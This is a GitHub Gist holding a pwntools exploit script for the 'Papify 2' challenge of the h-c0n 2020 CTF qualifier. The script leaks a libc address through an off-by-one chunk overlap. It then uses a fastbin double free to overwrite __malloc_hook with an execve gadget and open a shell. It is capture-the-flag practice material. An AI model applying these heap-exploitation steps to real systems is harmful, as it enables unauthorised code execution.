Skip to content

Instantly share code, notes, and snippets.

@jjluczyn

jjluczyn/papify2.py

Last active Jan 21, 2020
Embed
What would you like to do?
Exploit used to solve Papify 2 during h-c0n 2020 CTF qualifier (whole writeup https://raulmart.in/posts/h-c0n-papify-writeup/)
#!/usr/bin/env python2
from pwn import *
context.arch = 'amd64'
BINARY = './chall'
HOST, PORT = 'ctf.h-c0n.com', 60003
#elf = ELF(BINARY)
libc = ELF('./libc-cont.so')
#def debug(breakpoints):
## script = ""
# for bp in breakpoints:
# script += "b *0x%x\n"%(bp)
# gdb.attach(p,gdbscript=script)
# Application logic
#def initialize(answer):
## p.recv()
# p.send(answer)
context.log_level = 'debug'
def add(index, size, content):
p.sendlineafter('>> ', '1')
p.sendlineafter('Paper\'s index: ', str(index))
p.sendlineafter('Paper\'s size: ', str(size))
p.sendlineafter('Paper\'s content: ', content)
def show(index):
p.sendlineafter('>> ', '4')
p.sendlineafter('Paper\'s index: ', str(index))
def free(index):
p.sendlineafter('>> ', '3')
p.sendlineafter('Paper\'s index: ', str(index))
def start():
if not args.REMOTE:
return process(BINARY)
else:
return remote(HOST, PORT)
def fix_typo(index, pos, char):
p.sendlineafter('>> ', '2')
p.sendlineafter('Paper\'s index: ', str(index))
p.sendlineafter('Which typo do you want to fix?: ', str(pos))
p.sendlineafter('Fix\'s content: ', char)
p = start()
#if not args.REMOTE and args.GDB:
# debug([])
for i in range(7):
add(2, 128, "7"*128)
free(2)
add(0, 24, "A"*24)
add(1, 128, "B"*128)
add(2, 24, "C"*24)
free(1)
fix_typo(0, 24, '\x93')
add(1, 128, "d"*7 + "\n")
p.sendlineafter('>> ', '4')
p.sendlineafter('Paper\'s index: ', "1")
p.recvuntil('d' * 7 + '\n')
leak = p.recv(6) + '\x00\x00'
libcDir = u64(leak) -1985546
fakechunk = u64(leak) + 3
fakechunkFree = u64(leak) + 10635
system = libcDir + 290800
execve_addr = libcDir + 0x106ef8
for i in range(7):
add(2, 96, "R"*96)
free(2)
add(0, 96, "S"*96)
add(1, 96, "T"*96)
free(0)
free(1)
free(0)
add(1, 96, p64(fakechunk) + "U"*88)
add(1, 96, "X"*96)
add(1, 96, "Y"*96)
add(0,96, 'i' * 19 + p64(execve_addr) + "\x00"*20)
print u64(leak)
print libc.symbols['__malloc_hook']
p.interactive()
add(2,1,'\n')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment